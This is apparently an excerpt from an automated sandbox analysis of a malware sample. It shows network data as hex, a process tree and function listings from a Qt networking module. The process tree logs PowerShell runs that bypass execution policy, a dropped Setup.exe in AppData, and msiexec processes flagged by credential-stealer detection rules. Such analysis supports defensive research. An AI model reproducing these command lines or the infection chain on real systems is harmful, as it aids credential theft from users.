                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 4f 54 35 36 64 5a 6a 52 32 58 6b 50 70 2e 6f 6c 35 53 74 6f 57 31 6e 4e 6f 76 6a 51 6f 75 33 68 37 42 55 6a 57 51 41 55 34 52 4a 55 32 74 75 4e 43 6b 4e 37 72 48 31 42 77 6d 6c 5f 55 78 58 72 53 69 66 35 64 39 64 51 58 64 38 44 55 57 47 59 4b 34 52 70 6a 57 6a 6b 48 61 4f 6c 6d 74 6f 46 69 59 50 70 72 67 66 61 6b 75 68 4d 35 73 69 52 39 44 4d 42 73 32 71 4d 48 57 49 35 59 6b 4c 37 55 62 2e 4f 36 75 76 42 74 50 69 6b 4c 55 2e 32 6b 49 55 72 45 77 63 66 73 6e 6b 51 51 69 34 45 55 4d 4e 78 4f 64 4b 45 33 43 56 45 49 6f 42 61 54 77 47 70 41 5f 73 39 6d 52 43 34 70 61 63 31 59 35 48 75 77 59 7a 39 78 32 57 63 6d 50 70 43 61 33 47 6b 42 56 6e 52 42 68 33 72 4c 78 64 66 58 50 6e 51 6c 4d 31 75 57 2e 4b 48 31 5a 75 6b 54 56 4a 55 72 6a 56 38 74 6b 33 46 38 39 4a
                                                                                                                                                            Data Ascii: OT56dZjR2XkPp.ol5StoW1nNovjQou3h7BUjWQAU4RJU2tuNCkN7rH1Bwml_UxXrSif5d9dQXd8DUWGYK4RpjWjkHaOlmtoFiYPprgfakuhM5siR9DMBs2qMHWI5YkL7Ub.O6uvBtPikLU.2kIUrEwcfsnkQQi4EUMNxOdKE3CVEIoBaTwGpA_s9mRC4pac1Y5HuwYz9x2WcmPpCa3GkBVnRBh3rLxdfXPnQlM1uW.KH1ZukTVJUrjV8tk3F89J
                                                                                                                                                            2024-11-19 19:06:41 UTC1360INData Raw: 6c 5f 48 37 39 76 56 70 49 73 64 42 44 71 68 62 2e 6a 67 4e 54 74 35 52 59 59 4f 30 77 64 4f 70 66 66 74 45 38 54 66 33 4b 4d 72 61 51 75 5f 68 6d 44 41 53 50 76 48 76 4c 6a 59 5f 6a 62 4d 76 33 48 71 6f 30 78 47 71 5f 62 4f 43 69 45 64 43 4b 69 49 43 76 42 5f 6c 66 76 38 65 46 37 68 58 32 72 4d 62 48 44 73 30 2e 53 31 45 42 2e 37 37 7a 4c 46 2e 71 42 65 30 6c 55 58 76 62 36 58 54 73 39 30 77 54 66 4c 54 57 42 78 62 4c 30 4f 6e 74 4b 51 6f 6a 46 66 44 6b 4c 6f 51 6e 34 48 4e 62 59 36 48 41 57 51 62 36 32 62 62 44 43 65 50 6d 58 34 74 61 45 77 47 73 6e 7a 31 5f 4f 37 56 69 68 66 45 48 45 38 32 51 75 66 46 68 4a 32 44 41 69 5f 77 55 66 45 4a 31 53 54 4e 57 2e 47 70 62 31 79 66 62 55 52 5f 36 48 38 50 68 51 57 68 45 78 78 65 59 66 6d 75 54 65 2e 33 4b 6a 54
                                                                                                                                                            Data Ascii: l_H79vVpIsdBDqhb.jgNTt5RYYO0wdOpfftE8Tf3KMraQu_hmDASPvHvLjY_jbMv3Hqo0xGq_bOCiEdCKiICvB_lfv8eF7hX2rMbHDs0.S1EB.77zLF.qBe0lUXvb6XTs90wTfLTWBxbL0OntKQojFfDkLoQn4HNbY6HAWQb62bbDCePmX4taEwGsnz1_O7VihfEHE82QufFhJ2DAi_wUfEJ1STNW.Gpb1yfbUR_6H8PhQWhExxeYfmuTe.3KjT



                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:14:05:29
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1"
                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:14:05:29
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:14:06:03
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:14:06:11
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:14:06:12
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:14:06:12
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:14:06:19
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Imagebase:0x7ff7194a0000
                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2055763748.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2070770493.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2119642948.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2090149211.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2138816482.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2070467409.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:14:06:20
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:14:06:21
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:14:06:21
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:14:06:28
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Imagebase:0xaa0000
                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:14:06:41
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1"
                                                                                                                                                            Imagebase:0xb0000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:14:06:41
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@ReturnString@@$Variant@@$Object@@$MetaString@@@$Latin1Type@$ConnectionData@@ListUrl@@$?invokeArgument@@333333333@ByteConnection@Method@Qt@@Thread@@$?begin@?connect@?const?convert@?dispose@?end@?scheme@?set?start@?tr@?userArrayArray@@Bool@DataData@Data@1@@Name@ObjectObject@@@Priority@1@@Ptr@@@Qt@@@V0@@Valid@malloc
                                                                                                                                                              • String ID: -$1abortRequest()$1deleteLater()$1followRedirect()$1haveDataSlot(qint64,QByteArray,bool,qint64)$1httpAuthenticationRequired(QHttpNetworkRequest,QAuthenticator*)$1httpError(QNetworkReply::NetworkError,QString)$1onRedirected(QUrl,int,int)$1proxyAuthenticationRequired(QNetworkProxy,QAuthenticator*)$1readBufferFreed(qint64)$1readBufferSizeChanged(qint64)$1replyDownloadData(QByteArray)$1replyDownloadMetaData(QList<QPair<QByteArray,QByteArray> >, int, QString, bool, QSharedPointer<char>, qint64, qint64, bool)$1replyDownloadProgressSlot(qint64,qint64)$1replyEncrypted()$1replyFinished()$1replyPreSharedKeyAuthenticationRequiredSlot(QSslPreSharedKeyAuthenticator*)$1replySslConfigurationChanged(QSslConfiguration)$1replySslErrors(QList<QSslError>,bool*,QList<QSslError>*)$1resetUploadDataSlot(bool*)$1sentUploadDataSlot(qint64,qint64)$1startRequest()$1startRequestSynchronously()$1uploadByteDeviceReadyReadSlot()$1wantUploadDataSlot(qint64)$2abortHttpRequest()$2authenticationRequired(QHttpNetworkRequest,QAuthenticator*)$2downloadData(QByteArray)$2downloadFinished()$2downloadMetaData(QList<QPair<QByteArray,QByteArray> >, int, QString, bool, QSharedPointer<char>, qint64, qint64, bool)$2downloadProgress(qint64,qint64)$2encrypted()$2error(QNetworkReply::NetworkError,QString)$2finished()$2haveUploadData(qint64,QByteArray,bool,qint64)$2preSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$2processedData(qint64,qint64)$2proxyAuthenticationRequired(QNetworkProxy,QAuthenticator*)$2readBufferFreed(qint64)$2readBufferSizeChanged(qint64)$2readyRead()$2redirectAllowed()$2redirected(QUrl,int,int)$2resetData(bool*)$2sslConfigurationChanged(QSslConfiguration)$2sslErrors(QList<QSslError>,bool*,QList<QSslError>*)$2startHttpRequest()$2startHttpRequestSynchronously()$2wantData(qint64)$No suitable proxy found$QNetworkReply::NetworkError$QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$QString$Range$_q_error$_q_finished$bytes=$https$preconnect-http$preconnect-https
                                                                                                                                                              • API String ID: 3882774003-554745703
                                                                                                                                                              • Opcode ID: dd807478d720f85624826a8fe8e04cdc0551a79f858b373d29a40f8f946b469c
                                                                                                                                                              • Instruction ID: da6dabf81a21768a3defaed0826f7524b6207bfd5abd1856f2437600d5a23f1b
                                                                                                                                                              • Opcode Fuzzy Hash: dd807478d720f85624826a8fe8e04cdc0551a79f858b373d29a40f8f946b469c
                                                                                                                                                              • Instruction Fuzzy Hash: 0E1383B2A0AA8695EBA2DF35D8542ED3361FF44758F804132DE5E47664EF3CD64ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$Data@@$String@@$?qstrcmp@@$List$?size@Ref@@$Date$?free_helper@HashNode@1@@Time@@$?data@?end@Char@@$V0@@$Variant@@$?dispose@Data@1@@Hash@@memcmp$?begin@V0@$$$?add?currentEmpty@Int@Lower@Secs@String@@@TimeUtc@V1@_
                                                                                                                                                              • String ID: Cache-Control$connection$content-encoding$content-length$content-range$content-type$expires$keep-alive$last-modified$max-age$no-store$proxy-authenticate$proxy-authorization$set-cookie$trailers$transfer-encoding$upgrade$warning
                                                                                                                                                              • API String ID: 2422210890-3805654870
                                                                                                                                                              • Opcode ID: 12b6f2a41f9f8eb057b07bf23e9cb2a6bb022289403ac4499ad673deb956a344
                                                                                                                                                              • Instruction ID: 73bfb17112d251df3205cdcff009cf22e8e2b893b23d0a9db0ced095be7eca9c
                                                                                                                                                              • Opcode Fuzzy Hash: 12b6f2a41f9f8eb057b07bf23e9cb2a6bb022289403ac4499ad673deb956a344
                                                                                                                                                              • Instruction Fuzzy Hash: 967222B2A0AA4395EB92DF35D8541B96361FF84B98F844032DD5E475A4EF3CE54ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$String@@$Url@@$MetaVariant@@$ConnectionQt@@Type@$?invokeArgument@@333333333@Method@$BytePrivate@@$Array@@@Buffer@@Char@@@Connection@DeviceDevice@@Flags@FormattingObject@@@$?arg@?connect?open@?set?size@?translate@Application@@Array@@Base@Char@@ComponentCoreDataData@DecodeDevice@@@@@Flag@Impl@Latin1ModeMutex@@ObjectOpenOption@Option@2@@@@SlotString@String@@@U3@@V0@@malloc
                                                                                                                                                              • String ID: Invalid URI: %1$QNetworkAccessDataBackend$QNetworkReply::NetworkError$downloadProgress$errorOccurred$finished$metaDataChanged$qint64$readyRead
                                                                                                                                                              • API String ID: 2542142892-1981360243
                                                                                                                                                              • Opcode ID: c9e67992ece5033ec4afbdd3a893a400399509114d3e11e2e62667f81e5ea1bd
                                                                                                                                                              • Instruction ID: 88253be1ac08275a965f185e1287877e6fff4b7b301ca532664f31a0e04ca4d1
                                                                                                                                                              • Opcode Fuzzy Hash: c9e67992ece5033ec4afbdd3a893a400399509114d3e11e2e62667f81e5ea1bd
                                                                                                                                                              • Instruction Fuzzy Hash: BA726F26A18ED5D5F7129F38D8552E973B1FF98718F859222DE8D06A24FF38D249CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Data@@List$Meta$Generic$Argument@@Return$?begin@Connection@$String@@$ByteConnectionQt@@@Type@$?connect@Array@@Base@@Thread@$?cast@?dispose@?end@?moveDataData@1@@FactoryLoader@@Mutex@@String@@@Thread@@Thread@@@V0@@V2@@$?free?sender@?unlock@Data@1@Map@NodePrivate@@String$?detach@?detach_grow@?index?instance@?invoke?key?lock@?main?next?set?start@ApplicationArgument@@333333333@ArrayCaseCoreDaemonData@EnvironmentExceptionLatin1List@@List_contains@Method@MultiName@Node@ObjectObject@@@Priority@1@@Ptr@@@Qt@@Sensitivity@String@@@@ThrowTree@U1@@Value@@Variablemallocmemmove
                                                                                                                                                              • String ID: 1configurationAdded(QNetworkConfigurationPrivatePointer)$1configurationChanged(QNetworkConfigurationPrivatePointer)$1configurationRemoved(QNetworkConfigurationPrivatePointer)$1updateConfigurations()$2configurationAdded(QNetworkConfigurationPrivatePointer)$2configurationChanged(QNetworkConfigurationPrivatePointer)$2configurationRemoved(QNetworkConfigurationPrivatePointer)$2updateCompleted()$QT_EXCLUDE_GENERIC_BEARER$Unknown exception$generic$initialize
                                                                                                                                                              • API String ID: 289430799-250334310
                                                                                                                                                              • Opcode ID: e604a4aaf2e049d9e2425584b2fe89d7c65323b887598afc5a9a53fe502b2604
                                                                                                                                                              • Instruction ID: 895f8b10bd323ac727da0d8407d29ae208a85c5fc863230166a21522f7b87222
                                                                                                                                                              • Opcode Fuzzy Hash: e604a4aaf2e049d9e2425584b2fe89d7c65323b887598afc5a9a53fe502b2604
                                                                                                                                                              • Instruction Fuzzy Hash: 9A527262A0AA8285EBA2CF35D8582F973A1FF44B58F454132DE5D477A4EF3CD54ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Argument@@GenericReturnVariant@@$FileFormatting$Info@@$ComponentDateFlags@Latin1Option@$Char@@String@@@Time@@$?set?size@Char@@@Object@@Url@@@@@V0@@$?data@?path@Connection@Empty@MetaMode@1@@Option@2@@@@ParsingQt@@@String@Type@V0@$$$?arg@?connect@?const?host@?last?scheme@?translate@?userApplication@@ConnectionCoreData@Dir@File@File@@File@@@Host@Initialization@Int@LocalModified@Name@Path@Time@@@memmove
                                                                                                                                                              • String ID: 1uploadReadyReadSlot()$2readyRead()$Cannot open %1: Path is a directory$Error opening %1: %2$QNetworkAccessFileBackend$localhost$qrc$uploadReadyReadSlot
                                                                                                                                                              • API String ID: 2238512935-1139426471
                                                                                                                                                              • Opcode ID: 73548312622e6472f013ee2d0404b25c44cb3bd599bdfcf3fc6d0962cbb010cd
                                                                                                                                                              • Instruction ID: 3e74edda1c80d6959a20ef8b76cf381f055a2f08fbaa64e63912824331e70f6c
                                                                                                                                                              • Opcode Fuzzy Hash: 73548312622e6472f013ee2d0404b25c44cb3bd599bdfcf3fc6d0962cbb010cd
                                                                                                                                                              • Instruction Fuzzy Hash: 87225162A09A96D5EB62DF38D8542F833B1FF54759F804132DE5E16A64EF3CD24ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Array@@Byte$Data@@$ListString@@$V0@@$?begin@?dispose@?end@?size@Data@1@@HashUrl@@Valid@$?data@Bool@Char@@String@@@$?clear@?compare@?detach@?free?free_helper@?has?qstrcmp@@?scheme@CaseData@1@Empty@Hash@@Latin1Lower@Node@Node@1@@Qt@@@Sensitivity@Shrunk@mallocmemcmp
                                                                                                                                                              • String ID: Cache-Control$https$location$must-revalidate$set-cookie
                                                                                                                                                              • API String ID: 2244422892-2702059892
                                                                                                                                                              • Opcode ID: 8f974c9aacbd744b037d347b21ed6aba936a813b0627429718aec5f13dc6358b
                                                                                                                                                              • Instruction ID: 7e0b21d82940834f2ed568df3fd0ca7f658e963e3786a91a53eac594ea83ac84
                                                                                                                                                              • Opcode Fuzzy Hash: 8f974c9aacbd744b037d347b21ed6aba936a813b0627429718aec5f13dc6358b
                                                                                                                                                              • Instruction Fuzzy Hash: 22726EB2A0AA4286EB96DF35D8542FC2361FB44B9CF444032DE5E476A5EF3CD54ACB40
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
